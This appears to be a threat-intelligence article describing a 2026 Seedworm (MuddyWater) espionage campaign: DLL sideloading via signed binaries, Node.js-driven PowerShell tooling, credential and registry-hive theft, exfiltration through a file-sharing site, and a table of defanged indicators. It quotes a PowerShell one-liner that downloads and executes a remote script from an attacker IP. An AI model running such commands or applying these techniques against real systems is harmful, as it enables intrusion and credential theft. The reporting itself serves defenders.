Seedworm’s Evolution: Inside the Iranian-Linked APT’s Surgical Global Espionage Push

The advanced persistent threat (APT) group known as Seedworm—also identified by the monikers MuddyWater, Temp Zagros, and Static Kitten—has long been linked to the Iranian Ministry of Intelligence and Security (MOIS). Recent intelligence reveals that the group has significantly matured its operational tradecraft, launching a sophisticated global espionage campaign designed to bypass modern endpoint detection and response (EDR) systems.

This campaign has successfully breached at least nine distinct organizations across four continents. The targeting profile is highly surgical, impacting critical sectors including industrial manufacturing, financial services, aviation, government, and academia.

Notable victims include a prominent South Korean electronics manufacturer, a Middle Eastern aviation hub, and several strategic entities throughout Southeast Asia and Latin America. The objective is unmistakably clear: the exfiltration of high-value intellectual property, sensitive governmental intelligence, and strategic access to downstream supply chain partners.

According to detailed analysis by Symantec security researchers, the campaign was observed in early 2026. The group’s primary method of evasion involves the abuse of cryptographically signed binaries to perform DLL sideloading, effectively “hiding in plain sight” by utilizing legitimate software to execute malicious code.

The Mechanics of Binary Abuse and Sideloading

To evade signature-based defenses and blend into standard system telemetry, Seedworm leverages trusted executables to load weaponized Dynamic Link Libraries (DLLs). By using binaries that carry valid digital signatures, the attackers ensure that traditional security tools view the process execution as legitimate activity. A particularly deceptive aspect of this campaign is the targeting of security vendor binaries, which can complicate incident response workflows.

The primary vectors identified include:

  • fmapp.exe (Fortemedia): Weaponized to load the malicious fmapp.dll.
  • sentinelmemoryscanner.exe (SentinelOne): Exploited to load sentinelagentcore.dll.

Once these malicious DLLs are resident in memory, they deploy a specialized tool dubbed ChromElevator. This utility is specifically engineered to scrape sensitive data from Chromium-based browsers, including stored credentials, session cookies, and financial information.

Orchestration via Node.js and Modular Payloads

A significant evolution in Seedworm’s technical repertoire is the shift toward Node.js orchestration. Rather than relying solely on standard Windows processes, the attackers utilized Node.exe as a central parent process to manage DLL sideloading and the execution of various scripts. This provides a layer of abstraction that can decouple malicious intent from the actual payload execution.

The Node.js-based implant acts as a delivery vehicle for modular PowerShell scripts, which perform a range of post-exploitation tasks:

  • System Reconnaissance: Rapidly mapping the environment using whoami, hostname, and domain queries.
  • Visual Surveillance: Capturing screenshots of active user sessions to gauge high-value activity.
  • Credential Harvesting: Extracting the SAM, SECURITY, and SYSTEM registry hives to facilitate offline cracking.
  • Persistence & Pivoting: Establishing SOCKS5 reverse proxy tunnels to provide a stable, encrypted foothold for lateral movement.

Attackers frequently utilized one-liners to pull remote scripts, such as:

powershell -NoProfile -Command “iex (New-Object Net.WebClient).DownloadString(‘http://179.43.177[.]220:8080/nm.ps1’)”

Beyond basic script execution, the group employed advanced techniques to escalate privileges. One tool leveraged the Windows API CredUIPromptForWindowsCredentialsW to present users with a legitimate-looking credential prompt. Furthermore, the attackers demonstrated a deep understanding of Windows authentication by abusing Kerberos delegation via GSS-API to extract Ticket Granting Tickets (TGTs), allowing them to move through the network without needing plaintext passwords.

Exfiltration Tactics: Blending with Web Traffic

To avoid detection by network-layer security monitoring (such as DLP or NTA), Seedworm abandoned custom command-and-control (C2) infrastructure in favor of legitimate public services. They utilized sendit[.]sh, a public file-sharing platform, to exfiltrate stolen data. By routing exfiltration through high-reputation domains, the group significantly reduces the likelihood of triggering alerts based on anomalous outbound traffic.

Case Study: The South Korean Intrusion

The lifecycle of the intrusion into the South Korean manufacturer provides a blueprint of Seedworm’s operational discipline. The breach began on February 20, 2026, starting with automated reconnaissance via Node.js. Within minutes of initial access, the attackers had already captured screenshots and begun the payload download phase. Following DLL sideloading and the establishment of persistence via registry run keys, the group maintained a presence for over a week. Unlike “smash-and-grab” attackers, Seedworm operated with measured intervals—interspersing active data theft with quiet periods to mimic automated beaconing, concluding their primary phase around February 27.

Indicators of Compromise (IOCs)

File Indicators (SHA-256) Network IOCs
e25892603c42e34bd7ba0d8ea73be600d898cadc290e3417a82c04d6281b743b – fmapp.exe 179.43.177[.]220
c6182fd01b14d84723e3c9d11bc0e16b34de6607ccb8334fc9bb97c1b44f0cde – fmapp.dll 178.128.233[.]36
128b58a2a2f1df66c474094aacb7e50189025fbf45d7cd8e0834e93a8fbed667 – sentinelmemoryscanner.exe 172.67.156[.]47
0c9b911935a3705b0ad569446804d80026feb6db3884aeb240b6c76e9b8cf139 – sentinelagentcore.dll 104.21.48[.]205
74ab3838ebed7054b2254bf7d334c80c8b2cfec4a97d1706723f8ea55f11061f – Privilege escalation tool timetrakr[.]cloud
3ee7dab4ae4f6d4f16dfabb6f38faef370411a9fc00ff035844e54703b99600a – SAM hive extractor 37.187.78[.]41
bee79c3302b1a7afc0952842d14eff83a604ef00bfdae525176c16c80b2045f7 – SAM hive extractor 34.117.59[.]81
d587959841a763669279ad831b8f0379f6a7b037dffc19deab5d41f37f8b5ffc – Credential harvester sendit[.]sh
b21c802775df0c0d82c8cfde299084abc624898b10258db641b820172a0ba29a – Socks5 proxy tool http://179.43.177[.]220:8080/nm.ps1
http://179.43.177[.]220:8080/a.dat
http://179.43.177[.]220:8080/a.exe
http://ipinfo[.]io/json
https://svc.wompworthy[.]com

Security Advisory: IP addresses and domains have been defanged (e.g., [.]) to prevent accidental execution or automated ingestion. Analysts should only “re-fang” these indicators within isolated threat intelligence platforms such as MISP, VirusTotal, or a dedicated SIEM environment.

Related Articles

Back to top button